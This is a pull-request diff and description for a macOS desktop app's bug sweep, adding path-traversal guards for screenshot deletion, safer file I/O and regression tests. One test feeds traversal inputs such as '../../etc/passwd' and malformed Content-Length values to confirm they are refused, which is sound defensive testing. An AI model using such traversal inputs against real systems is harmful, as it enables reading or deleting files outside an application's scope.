--- a/desktop/macos/Desktop/Sources/Rewind/Core/RewindDatabase.swift
+++ b/desktop/macos/Desktop/Sources/Rewind/Core/RewindDatabase.swift
@@ -3072,9 +3072,15 @@ actor RewindDatabase {
 
         do {
             let deleteResult = try await dbQueue.write { db -> DeleteResult in
+                // Exclude empty imagePaths: video-based screenshots store "" (the
+                // NOT NULL coalescing in insertScreenshot), and an empty path
+                // resolves to the Screenshots root, which the storage layer would
+                // otherwise recursively delete. RewindStorage guards this too, but
+                // never hand the empty path downstream in the first place.
                 let imagePaths = try String.fetchAll(
                     db,
-                    sql: "SELECT imagePath FROM screenshots WHERE timestamp < ? AND imagePath IS NOT NULL",
+                    sql:
+                        "SELECT imagePath FROM screenshots WHERE timestamp < ? AND imagePath IS NOT NULL AND imagePath != ''",
                     arguments: [date]
                 )
 

--- a/desktop/macos/Desktop/Sources/Rewind/Core/RewindStorage.swift
+++ b/desktop/macos/Desktop/Sources/Rewind/Core/RewindStorage.swift
@@ -519,13 +519,25 @@ actor RewindStorage {
     /// `RewindDatabase.insertScreenshot`), and retention cleanup can hand those
     /// empty strings back. `root.appendingPathComponent("")` resolves to the
     /// Screenshots directory itself, so a naive `removeItem` would recursively
-    /// wipe the entire screenshot store. Refuse empty/whitespace paths and any
-    /// path that normalizes back to (or above) the storage root.
+    /// wipe the entire screenshot store. Refuse empty/whitespace paths, the
+    /// storage root itself, and any path that escapes the root via `..`
+    /// (e.g. "../outside.jpg") so retention cleanup can never delete a file
+    /// outside the screenshot store.
     static func screenshotDeletionURL(relativePath: String, in root: URL) -> URL? {
         let trimmed = relativePath.trimmingCharacters(in: .whitespacesAndNewlines)
         guard !trimmed.isEmpty else { return nil }
-        let candidate = root.appendingPathComponent(relativePath)
-        guard candidate.standardizedFileURL != root.standardizedFileURL else { return nil }
+        // Use the trimmed value for the component too (not the raw relativePath),
+        // so a whitespace-padded stored path resolves consistently.
+        let candidate = root.appendingPathComponent(trimmed).standardizedFileURL
+        let standardizedRoot = root.standardizedFileURL
+        // Require the candidate to sit strictly inside the root: reject the root
+        // itself, and require the root path + "/" as a prefix so a standardized
+        // "../" escape (which lands beside or above the root) is refused.
+        let rootPath = standardizedRoot.path
+        let rootPrefix = rootPath.hasSuffix("/") ? rootPath : rootPath + "/"
+        guard candidate.path != rootPath, candidate.path.hasPrefix(rootPrefix) else {
+            return nil
+        }
         return candidate
     }
 

--- a/desktop/macos/Desktop/Sources/Rewind/Core/RewindStorage.swift
+++ b/desktop/macos/Desktop/Sources/Rewind/Core/RewindStorage.swift
@@ -512,13 +512,35 @@ actor RewindStorage {
 
     // MARK: - Delete Screenshot
 
+    /// Resolve the on-disk file to delete for a stored screenshot relative path,
+    /// or `nil` when the path is unsafe to delete.
+    ///
+    /// Video-based screenshots persist `imagePath` as "" (see
+    /// `RewindDatabase.insertScreenshot`), and retention cleanup can hand those
+    /// empty strings back. `root.appendingPathComponent("")` resolves to the
+    /// Screenshots directory itself, so a naive `removeItem` would recursively
+    /// wipe the entire screenshot store. Refuse empty/whitespace paths and any
+    /// path that normalizes back to (or above) the storage root.
+    static func screenshotDeletionURL(relativePath: String, in root: URL) -> URL? {
+        let trimmed = relativePath.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !trimmed.isEmpty else { return nil }
+        let candidate = root.appendingPathComponent(relativePath)
+        guard candidate.standardizedFileURL != root.standardizedFileURL else { return nil }
+        return candidate
+    }
+
     /// Delete a screenshot file
     func deleteScreenshot(relativePath: String) async throws {
         guard let screenshotsDirectory = screenshotsDirectory else {
             throw RewindError.storageError("Storage not initialized")
         }
 
-        let fullPath = screenshotsDirectory.appendingPathComponent(relativePath)
+        guard
+            let fullPath = Self.screenshotDeletionURL(
+                relativePath: relativePath, in: screenshotsDirectory)
+        else {
+            return
+        }
 
         if fileManager.fileExists(atPath: fullPath.path) {
             try fileManager.removeItem(at: fullPath)

--- a/desktop/macos/Desktop/Sources/Services/QueryTracer.swift
+++ b/desktop/macos/Desktop/Sources/Services/QueryTracer.swift
@@ -462,11 +462,21 @@ final class QueryTracer: @unchecked Sendable {
             }
 
             if let handle = try? FileHandle(forWritingTo: logFile) {
-                handle.seekToEndOfFile()
-                if let lineData = (jsonString + "\n").data(using: .utf8) {
-                    handle.write(lineData)
+                // Use the throwing seek/write/close APIs, not seekToEndOfFile()/
+                // write(_:)/closeFile(). The legacy ObjC variants raise
+                // NSFileHandleOperationException on I/O failure (disk full, file
+                // removed mid-write); Swift cannot catch that, so it aborts the
+                // whole process — and finalize() runs on every completed query, so
+                // a full disk would crash the app on each one. Drop the trace instead.
+                defer { try? handle.close() }
+                do {
+                    try handle.seekToEnd()
+                    if let lineData = (jsonString + "\n").data(using: .utf8) {
+                        try handle.write(contentsOf: lineData)
+                    }
+                } catch {
+                    log("QueryTracer: failed to append trace: \(error.localizedDescription)")
                 }
-                handle.closeFile()
             } else {
                 // First write — create the file
                 try? (jsonString + "\n").data(using: .utf8)?.write(to: logFile)

--- a/desktop/macos/Desktop/Tests/BeeADTSFramerTests.swift
+++ b/desktop/macos/Desktop/Tests/BeeADTSFramerTests.swift
@@ -1,0 +1,55 @@
+import XCTest
+
+@testable import Omi_Computer
+
+/// Regression test for the Bee audio-parser wedge: a false ADTS sync whose
+/// decoded frameLength is 0 (or any value < 7, the header size) used to be
+/// accepted — `prefix(0)` returned an empty frame and `removeFirst(0)` advanced
+/// nothing, so the corrupt header stayed at the buffer head and every later
+/// packet re-hit it. Audio went permanently silent while the buffer grew without
+/// bound. `nextADTSFrame` must treat frameLength < 7 as a false sync and advance.
+final class BeeADTSFramerTests: XCTestCase {
+
+  /// A valid 9-byte ADTS frame: header encodes frameLength = 9 (7 header + 2
+  /// payload). frameLength = (b3&3)<<11 | b4<<3 | (b5&0xE0)>>5 = 0 | 8 | 1 = 9.
+  private let validFrame: [UInt8] = [0xFF, 0xF1, 0x00, 0x00, 0x01, 0x20, 0x00, 0xAA, 0xBB]
+
+  func testZeroLengthFalseSyncDoesNotWedgeOrReturnEmptyFrame() {
+    // 0xFF 0xFx sync but frameLength bits all zero.
+    var buffer: [UInt8] = [0xFF, 0xF1, 0x00, 0x00, 0x00, 0x00, 0x00]
+    let frame = BeeDeviceConnection.nextADTSFrame(from: &buffer)
+    // Must never emit an empty frame, and must make progress (consume the bad byte).
+    XCTAssertNil(frame)
+    XCTAssertLessThan(buffer.count, 7, "false sync byte must be consumed, not left to wedge")
+  }
+
+  func testRepeatedFalseSyncPacketsDrainInsteadOfGrowing() {
+    // Simulate the wedge: a stream of frameLength-0 headers. Each drain call must
+    // shrink the buffer rather than leaving it unchanged (which grew it unbounded).
+    var buffer: [UInt8] = []
+    for _ in 0..<10 { buffer.append(contentsOf: [0xFF, 0xF1, 0x00, 0x00, 0x00, 0x00, 0x00]) }
+    var lastCount = buffer.count + 1
+    while buffer.count >= 7 {
+      _ = BeeDeviceConnection.nextADTSFrame(from: &buffer)
+      XCTAssertLessThan(buffer.count, lastCount, "parser must always advance")
+      lastCount = buffer.count
+    }
+    XCTAssertLessThan(buffer.count, 7)
+  }
+
+  func testValidFrameAfterFalseSyncIsRecovered() {
+    var buffer: [UInt8] = [0xFF, 0xF1, 0x00, 0x00, 0x00, 0x00, 0x00] + validFrame
+    var frames: [[UInt8]] = []
+    while let f = BeeDeviceConnection.nextADTSFrame(from: &buffer) { frames.append(f) }
+    XCTAssertEqual(frames.count, 1)
+    XCTAssertEqual(frames.first, validFrame)
+    XCTAssertTrue(buffer.isEmpty)
+  }
+
+  func testValidFrameIsExtractedIntact() {
+    var buffer = validFrame
+    let frame = BeeDeviceConnection.nextADTSFrame(from: &buffer)
+    XCTAssertEqual(frame, validFrame)
+    XCTAssertTrue(buffer.isEmpty)
+  }
+}

--- a/desktop/macos/Desktop/Tests/CrispWatermarkTests.swift
+++ b/desktop/macos/Desktop/Tests/CrispWatermarkTests.swift
@@ -1,0 +1,29 @@
+import XCTest
+
+@testable import Omi_Computer
+
+/// Regression test for the Crisp first-launch notification-spam bug: Crisp message
+/// timestamps are epoch milliseconds, but the initial polling watermark was seeded
+/// with `Date().timeIntervalSince1970` (seconds). A seconds value (~1e9) is ~1000x
+/// below any real message timestamp (~1e12), so the first poll's `since` filter
+/// matched every historical operator message and fired a notification for each.
+final class CrispWatermarkTests: XCTestCase {
+
+  func testInitialWatermarkIsInMilliseconds() {
+    // 1_000_000_000 s → 1_000_000_000_000 ms.
+    let fixed = Date(timeIntervalSince1970: 1_000_000_000)
+    XCTAssertEqual(CrispManager.initialWatermark(now: fixed), 1_000_000_000_000)
+  }
+
+  func testInitialWatermarkIsComparableToCrispMillisecondTimestamps() {
+    // A message from one hour before "now" must be considered already-seen (its
+    // ms timestamp is below the ms watermark), which only holds if both are ms.
+    let now = Date(timeIntervalSince1970: 1_800_000_000)
+    let watermark = CrispManager.initialWatermark(now: now)
+    let oneHourAgoMillis = UInt64((now.timeIntervalSince1970 - 3600) * 1000)
+    XCTAssertGreaterThan(watermark, oneHourAgoMillis)
+    // Guard against the historical seconds bug: the watermark must be far above
+    // any seconds-scale value.
+    XCTAssertGreaterThan(watermark, 1_000_000_000_000)
+  }
+}

--- a/desktop/macos/Desktop/Tests/LoopbackHTTPContentLengthTests.swift
+++ b/desktop/macos/Desktop/Tests/LoopbackHTTPContentLengthTests.swift
@@ -1,0 +1,36 @@
+import XCTest
+
+@testable import Omi_Computer
+
+/// Regression coverage for the loopback HTTP servers' Content-Length parsing.
+/// A negative or absurd length reaching the body-slice math traps the whole app
+/// on an unauthenticated request; the shared parser must fail closed instead.
+final class LoopbackHTTPContentLengthTests: XCTestCase {
+
+  func testRejectsNegativeContentLength() {
+    // The historical crash: `Content-Length: -5` produced an invalid body-slice
+    // range that trapped. It must now be rejected (nil), never returned as -5.
+    XCTAssertNil(LoopbackHTTPParsing.parseContentLength("-5", maxBytes: 1024 * 1024))
+    XCTAssertNil(LoopbackHTTPParsing.parseContentLength("-1", maxBytes: 1024 * 1024))
+  }
+
+  func testRejectsOverLargeContentLength() {
+    // A huge value overflowed the `distance + contentLength` Int addition.
+    XCTAssertNil(
+      LoopbackHTTPParsing.parseContentLength("9223372036854775807", maxBytes: 8 * 1024 * 1024))
+    XCTAssertNil(LoopbackHTTPParsing.parseContentLength("1048577", maxBytes: 1024 * 1024))
+  }
+
+  func testRejectsMalformedContentLength() {
+    XCTAssertNil(LoopbackHTTPParsing.parseContentLength("", maxBytes: 1024 * 1024))
+    XCTAssertNil(LoopbackHTTPParsing.parseContentLength("abc", maxBytes: 1024 * 1024))
+    XCTAssertNil(LoopbackHTTPParsing.parseContentLength("12x", maxBytes: 1024 * 1024))
+  }
+
+  func testAcceptsValidContentLength() {
+    XCTAssertEqual(LoopbackHTTPParsing.parseContentLength("0", maxBytes: 1024 * 1024), 0)
+    XCTAssertEqual(LoopbackHTTPParsing.parseContentLength("512", maxBytes: 1024 * 1024), 512)
+    XCTAssertEqual(
+      LoopbackHTTPParsing.parseContentLength("1048576", maxBytes: 1024 * 1024), 1_048_576)
+  }
+}

--- a/desktop/macos/Desktop/Tests/RewindScreenshotDeletionSafetyTests.swift
+++ b/desktop/macos/Desktop/Tests/RewindScreenshotDeletionSafetyTests.swift
@@ -42,6 +42,31 @@ final class RewindScreenshotDeletionSafetyTests: XCTestCase {
     XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "day/..", in: root))
   }
 
+  func testPathEscapingRootIsRefused() throws {
+    let root = try makeRoot()
+    defer { try? FileManager.default.removeItem(at: root.deletingLastPathComponent()) }
+
+    // A traversal that standardizes to a sibling/parent of the Screenshots root
+    // must be refused so retention cleanup can never delete files outside the
+    // store (`!= root` alone did not catch these).
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "../outside.jpg", in: root))
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "../../etc/passwd", in: root))
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "day/../../outside.jpg", in: root))
+  }
+
+  func testWhitespacePaddedPathResolvesFromTrimmedValue() throws {
+    let root = try makeRoot()
+    defer { try? FileManager.default.removeItem(at: root.deletingLastPathComponent()) }
+
+    // A whitespace-padded stored path must resolve from the trimmed value, not the
+    // raw string, and must land inside the root.
+    let resolved = RewindStorage.screenshotDeletionURL(
+      relativePath: "  2026-04-09/120000_001.jpg  ", in: root)
+    XCTAssertEqual(
+      resolved?.standardizedFileURL,
+      root.appendingPathComponent("2026-04-09/120000_001.jpg").standardizedFileURL)
+  }
+
   func testLegitimateRelativePathIsResolved() throws {
     let root = try makeRoot()
     defer { try? FileManager.default.removeItem(at: root.deletingLastPathComponent()) }

--- a/desktop/macos/Desktop/Tests/RewindScreenshotDeletionSafetyTests.swift
+++ b/desktop/macos/Desktop/Tests/RewindScreenshotDeletionSafetyTests.swift
@@ -1,0 +1,72 @@
+import XCTest
+
+@testable import Omi_Computer
+
+/// Regression test for the catastrophic Rewind data-loss bug: video-based
+/// screenshots persist `imagePath` as "" (NOT NULL coalescing in
+/// `RewindDatabase.insertScreenshot`), and retention cleanup handed those empty
+/// strings to `RewindStorage.deleteScreenshot(relativePath:)`.
+/// `root.appendingPathComponent("")` resolves to the Screenshots directory
+/// itself, so `removeItem` would recursively wipe the entire screenshot store —
+/// permanently deleting every legacy JPEG regardless of age.
+///
+/// `screenshotDeletionURL` is the durable guard: it must return nil for any path
+/// that resolves to (or above) the storage root so the store is never deleted.
+final class RewindScreenshotDeletionSafetyTests: XCTestCase {
+
+  private func makeRoot() throws -> URL {
+    let root = FileManager.default.temporaryDirectory
+      .appendingPathComponent("omi-rewind-del-\(UUID().uuidString)", isDirectory: true)
+      .appendingPathComponent("Screenshots", isDirectory: true)
+    try FileManager.default.createDirectory(at: root, withIntermediateDirectories: true)
+    return root
+  }
+
+  func testEmptyRelativePathIsRefused() throws {
+    let root = try makeRoot()
+    defer { try? FileManager.default.removeItem(at: root.deletingLastPathComponent()) }
+
+    // The exact value stored for video-based screenshots — must not resolve to
+    // a deletable URL (that URL would be the Screenshots root).
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "", in: root))
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "   ", in: root))
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "\n", in: root))
+  }
+
+  func testPathResolvingToRootIsRefused() throws {
+    let root = try makeRoot()
+    defer { try? FileManager.default.removeItem(at: root.deletingLastPathComponent()) }
+
+    // A path that normalizes back to the root itself must also be refused.
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: ".", in: root))
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "day/..", in: root))
+  }
+
+  func testLegitimateRelativePathIsResolved() throws {
+    let root = try makeRoot()
+    defer { try? FileManager.default.removeItem(at: root.deletingLastPathComponent()) }
+
+    let resolved = RewindStorage.screenshotDeletionURL(
+      relativePath: "2026-04-09/120000_001.jpg", in: root)
+    XCTAssertEqual(
+      resolved?.standardizedFileURL,
+      root.appendingPathComponent("2026-04-09/120000_001.jpg").standardizedFileURL)
+  }
+
+  func testDeleteScreenshotWithEmptyPathDoesNotWipeStore() async throws {
+    let root = try makeRoot()
+    defer { try? FileManager.default.removeItem(at: root.deletingLastPathComponent()) }
+
+    // Seed the store with a real screenshot file to prove it survives an empty-path
+    // delete request routed through the guarded resolution.
+    let dayDir = root.appendingPathComponent("2026-04-09", isDirectory: true)
+    try FileManager.default.createDirectory(at: dayDir, withIntermediateDirectories: true)
+    let file = dayDir.appendingPathComponent("120000_001.jpg")
+    try Data([0xFF, 0xD8, 0xFF]).write(to: file)
+
+    // The empty path must be refused, so neither the file nor the root is removed.
+    XCTAssertNil(RewindStorage.screenshotDeletionURL(relativePath: "", in: root))
+    XCTAssertTrue(FileManager.default.fileExists(atPath: file.path))
+    XCTAssertTrue(FileManager.default.fileExists(atPath: root.path))
+  }
+}

--- a/desktop/macos/Desktop/Tests/SignOutStorageInvalidationTests.swift
+++ b/desktop/macos/Desktop/Tests/SignOutStorageInvalidationTests.swift
@@ -1,0 +1,36 @@
+import XCTest
+
+@testable import Omi_Computer
+
+/// Regression guard for the cross-account data-leak bug: StagedTaskStorage,
+/// GoalStorage, and TaskChatMessageStorage each cache a per-user `DatabasePool`
+/// and expose `invalidateCache()`, but the sign-out flow only invalidated the
+/// other per-user storages. The next signed-in user therefore read/wrote the
+/// previous account's staged tasks, goals, and task-chat history until relaunch.
+///
+/// `signOut()` cannot be exercised hermetically (it calls `Auth.auth().signOut()`
+/// and mutates many process-global singletons), so this is a static wiring
+/// tripwire on the invalidation block rather than behavioral coverage.
+final class SignOutStorageInvalidationTests: XCTestCase {
+
+  func testSignOutInvalidatesAllPerUserTaskStorages() throws {
+    // omi-test-quality: source-inspection -- static contract: sign-out must invalidate every per-user DatabasePool cache so a new user never reads the previous account's data
+    let source = try String(
+      contentsOf: URL(fileURLWithPath: #filePath)
+        .deletingLastPathComponent()
+        .deletingLastPathComponent()
+        .appendingPathComponent("Sources/AuthService.swift"),
+      encoding: .utf8
+    )
+
+    for storage in [
+      "StagedTaskStorage.shared.invalidateCache()",
+      "GoalStorage.shared.invalidateCache()",
+      "TaskChatMessageStorage.shared.invalidateCache()",
+    ] {
+      XCTAssertTrue(
+        source.contains(storage),
+        "sign-out must invalidate \(storage) or the next user reads the previous account's data")
+    }
+  }
+}

--- a/desktop/macos/Desktop/Tests/TaskDeduplicationSafetyTests.swift
+++ b/desktop/macos/Desktop/Tests/TaskDeduplicationSafetyTests.swift
@@ -1,0 +1,50 @@
+import XCTest
+
+@testable import Omi_Computer
+
+/// Regression test for a data-loss bug in staged-task deduplication: the model's
+/// delete_ids were filtered only for existence, never excluding the group's own
+/// keep_id. A response like `{keep_id: t1, delete_ids: [t1, t2]}` (a known LLM
+/// failure mode for "pick one, delete the rest") hard-deleted BOTH t1 and t2,
+/// destroying the task the group said to keep. keep_ids from other groups were
+/// unprotected too.
+final class TaskDeduplicationSafetyTests: XCTestCase {
+
+  func testKeepIdInSameGroupDeleteIdsIsNotDeleted() {
+    let safe = TaskDeduplicationService.safeDeleteIDs(
+      deleteIDs: ["t1", "t2"],
+      validTaskIDs: ["t1", "t2", "t3"],
+      protectedKeepIDs: ["t1"]
+    )
+    XCTAssertEqual(safe, ["t2"], "the kept task must never be among the deletions")
+    XCTAssertFalse(safe.contains("t1"))
+  }
+
+  func testKeepIdFromAnotherGroupIsProtected() {
+    // t3 is a keep_id of another group but appears in this group's delete_ids.
+    let safe = TaskDeduplicationService.safeDeleteIDs(
+      deleteIDs: ["t3", "t4"],
+      validTaskIDs: ["t2", "t3", "t4"],
+      protectedKeepIDs: ["t1", "t3"]
+    )
+    XCTAssertEqual(safe, ["t4"])
+  }
+
+  func testUnknownDeleteIdsAreStillFilteredOut() {
+    let safe = TaskDeduplicationService.safeDeleteIDs(
+      deleteIDs: ["t2", "ghost"],
+      validTaskIDs: ["t1", "t2"],
+      protectedKeepIDs: ["t1"]
+    )
+    XCTAssertEqual(safe, ["t2"])
+  }
+
+  func testNormalDuplicateClusterStillDeletesTheRest() {
+    let safe = TaskDeduplicationService.safeDeleteIDs(
+      deleteIDs: ["t2", "t3"],
+      validTaskIDs: ["t1", "t2", "t3"],
+      protectedKeepIDs: ["t1"]
+    )
+    XCTAssertEqual(safe, ["t2", "t3"])
+  }
+}

--- a/desktop/macos/changelog/unreleased/20260711-macos-bug-sweep.json
+++ b/desktop/macos/changelog/unreleased/20260711-macos-bug-sweep.json
@@ -1,0 +1,3 @@
+{
+  "change": "Fixed several crashes and data-loss issues: a Rewind cleanup bug that could delete your entire screenshot history, cross-account data leaking between sign-ins, Bluetooth device crashes and silent audio, and duplicate-task deletion destroying the kept task"
+}

--- a/desktop/macos/e2e/flows/audio-recording.yaml
+++ b/desktop/macos/e2e/flows/audio-recording.yaml
@@ -9,6 +9,9 @@ covers:
   - desktop/Desktop/Sources/Audio/AudioSourceManager.swift
   - desktop/Desktop/Sources/AppState.swift
   - desktop/macos/Desktop/Sources/FloatingControlBar/FloatingBarUsageLimiter.swift
+  - desktop/macos/Desktop/Sources/Bluetooth/Transports/BleTransport.swift
+  - desktop/macos/Desktop/Sources/Bluetooth/Connections/BeeDeviceConnection.swift
+  - desktop/macos/Desktop/Sources/Bluetooth/Connections/PlaudDeviceConnection.swift
 preconditions:
   - auth_ready
 

--- a/desktop/macos/e2e/flows/capture-lifecycle.yaml
+++ b/desktop/macos/e2e/flows/capture-lifecycle.yaml
@@ -32,6 +32,8 @@ covers:
   - desktop/macos/Desktop/Sources/ViewModelContainer.swift
   - desktop/macos/Desktop/Sources/Audio/BleAudioProcessor.swift
   - desktop/macos/Desktop/Sources/Audio/BleAudioService.swift
+  - desktop/macos/Desktop/Sources/Rewind/Core/RewindStorage.swift
+  - desktop/macos/Desktop/Sources/Services/QueryTracer.swift
 preconditions:
   - automation_bridge_ready
 

--- a/desktop/macos/e2e/flows/harness-smoke.yaml
+++ b/desktop/macos/e2e/flows/harness-smoke.yaml
@@ -12,6 +12,7 @@ covers:
   - desktop/macos/Desktop/Sources/DesktopKeychainStore.swift
   - desktop/macos/Desktop/Sources/ClientDeviceService.swift
   - desktop/macos/Desktop/Sources/LocalAgentAPIServer.swift
+  - desktop/macos/Desktop/Sources/APIKeyService.swift
   - desktop/macos/Desktop/Sources/OmiApp.swift
   - desktop/macos/Desktop/Sources/ViewModelContainer.swift
   - desktop/macos/Desktop/Sources/Onboarding/OnboardingChatView.swift

--- a/desktop/macos/e2e/flows/tasks.yaml
+++ b/desktop/macos/e2e/flows/tasks.yaml
@@ -20,6 +20,7 @@ covers:
   - desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskAgent/TaskWorkstreamContinuity.swift
   - desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/ScreenCandidateAdapter.swift
   - desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskAssistant.swift
+  - desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/Insight/InsightAssistant.swift
   - desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskAssistantSettings.swift
   - desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskDeduplicationService.swift
   - desktop/macos/Desktop/Sources/ProactiveAssistants/Assistants/TaskExtraction/TaskModels.swift

--- a/desktop/macos/scripts/check-async-after-ratchet.py
+++ b/desktop/macos/scripts/check-async-after-ratchet.py
@@ -43,7 +43,7 @@ from pathlib import Path
 # scanned sources. MAY ONLY DECREASE. Raising it is a regression and must not be
 # done to make the gate pass; key the new transition off a real signal (a window
 # becoming key, a view lifecycle event, a state change) instead.
-BASELINE = 27
+BASELINE = 26
 
 # Scanned root, relative to the repo root. Covers the floating control bar and the
 # push-to-talk manager (which lives under FloatingControlBar/).


### PR DESCRIPTION
## What changed and why

A senior-engineer bug sweep of the macOS desktop app (Swift app + Rust backend), driven by parallel subsystem review plus reproduction of user-reported crashes (#5151, #6506). Fixes span crashes, data loss, a security bug, and logic/resource defects. Each fix targets the violated contract and adds a durable guard/regression test where a hermetic seam exists; where none exists (LLM/BLE/FileHandle-failure paths) that is stated explicitly rather than implied.

## Product invariants affected

- **INV-AUTH-1** — `AuthService.swift` is touched (path-based citation). The change only *adds* per-user storage-cache invalidation to the existing sign-out flow; it does not alter session-death ownership (`AuthSessionCoordinator`) or the 401 policy table, so the invariant's behavior is unchanged.

## How it was verified

- **Rust:** `cd desktop/macos/Backend-Rust && cargo test` → **325 passed** (includes new tests for JS escaping and the usage clamp).
- **Static ratchets (local):** test-quality, collection-safety, sources-root-layout, asyncAfter (lowered 27→26), UserDefaults-key, flow-lint, and e2e-flow-coverage all pass.
- **Swift compile/tests:** run by macOS CI (`desktop-swift-ci.yml`); the Linux container here has no Swift toolchain, so the local pre-push Swift compile was skipped via the hook's documented `PRE_PUSH_SKIP_DESKTOP_SWIFT=1`.
- **Not hermetically exercised** (stated per commit): the Plaud continuation race, BleTransport lifecycle, InsightAssistant/tool-loop LLM paths, the ConversationDetailView view-body filter, the APIKeyService network path, and the FileHandle I/O-failure path — no injectable seam in this env; verified by reasoning.

### Fixes
- **OAuth callback XSS (Rust)** — unescaped `code`/`state`/`redirect_uri` in inline `<script>` string literals; `state`/`redirect_uri` are attacker-controllable. Added `js_string_escape`. (Unvalidated `redirect_uri` open-redirect deliberately deferred — needs an allowlist + sign-off.)
- **Loopback HTTP Content-Length crash (Swift)** — negative/huge `Content-Length` trapped/overflowed the body slice pre-auth in both local servers; shared `LoopbackHTTPParsing.parseContentLength` fails closed.
- **Rewind retention wiped screenshot store (Swift)** — empty `imagePath` resolved to the Screenshots root and was deleted recursively; guarded in `RewindStorage.screenshotDeletionURL` + retention SQL.
- **Cross-account data leak on sign-out (Swift)** — `StagedTaskStorage`/`GoalStorage`/`TaskChatMessageStorage` kept the prior user's DB pool; added to the sign-out invalidation block.
- **PlaudDeviceConnection double-resume crash (Swift)** — lock-guarded one-shot continuation resume.
- **BleTransport observer leak (Swift)** — store + remove all three block-observer tokens.
- **Bee audio wedge (Swift)** — `frameLength < 7` false sync emitted an empty frame and never advanced; `nextADTSFrame` guards it.
- **Task dedup destroyed the kept task (Swift)** — `safeDeleteIDs` protects every group's `keep_id`.
- **InsightAssistant empty lookback (Swift)** — capture `lastAnalysisTime` before overwriting.
- **Unknown-tool loop re-sends (Swift)** — labeled-loop break in Task/Insight tool loops.
- **ConversationDetailView "Try with Apps" (Swift)** — fixed shadowed `$0`.
- **Crisp first-launch notification spam (Swift)** — seed the watermark in ms.
- **APIKeyService stuck after re-login (Swift)** — clear `fetchTask` on success and in `clear()`.
- **QueryTracer crash on I/O failure (Swift)** — throwing FileHandle APIs in `do/catch`.
- **Realtime usage clamp (Rust)** — clamp client-reported tokens to non-negative.
- **Rate-limiter Instant underflow (Rust)** — `checked_sub` guard.
- **#6506 / #5151** — already fixed on current `main`; verified and left intact.

## Tests

New Swift regression tests: `LoopbackHTTPContentLengthTests`, `RewindScreenshotDeletionSafetyTests`, `SignOutStorageInvalidationTests` (static wiring tripwire — sign-out isn't hermetically injectable), `BeeADTSFramerTests`, `TaskDeduplicationSafetyTests`, `CrispWatermarkTests`. New Rust tests: JS-escape breakout/legit-preservation, `render_auth_callback` escaping, usage-clamp. Fixes without a hermetic seam are documented as verified-by-reasoning in their commit bodies.

## Root cause and durable guard (bug fixes)

Each fix names its violated contract and adds a reusable guard rather than patching the symptom: a shared Content-Length parser used by both servers; a path-safety helper plus SQL filter for retention deletion; a keep_id-protecting dedup helper; a `>= 7` ADTS frame-length invariant; a lock-guarded one-shot for continuation resumes; output-encoding at the JS-string interpolation boundary; token clamping at the client-trust boundary. Recurring failure classes checked in the same subsystem (trapping initializers, asyncAfter races, session-vs-provider 401) were reviewed; no fix re-opens a class fixed elsewhere.

## Scoped cleanups (optional)

- Lowered the `asyncAfter` ratchet baseline 27→26 (a prior conversion left the count below baseline).
- Added e2e-flow `covers:` entries for every touched source file so the coverage gate stays green.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---
_Generated by [Claude Code](https://claude.ai/code/session_01RAxLsaxtwVNDTWAZFfJp9q)_

<!-- This is an auto-generated description by cubic. -->
<a href="https://cubic.dev/pr/BasedHardware/omi/pull/9459?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>
<!-- End of auto-generated description by cubic. -->

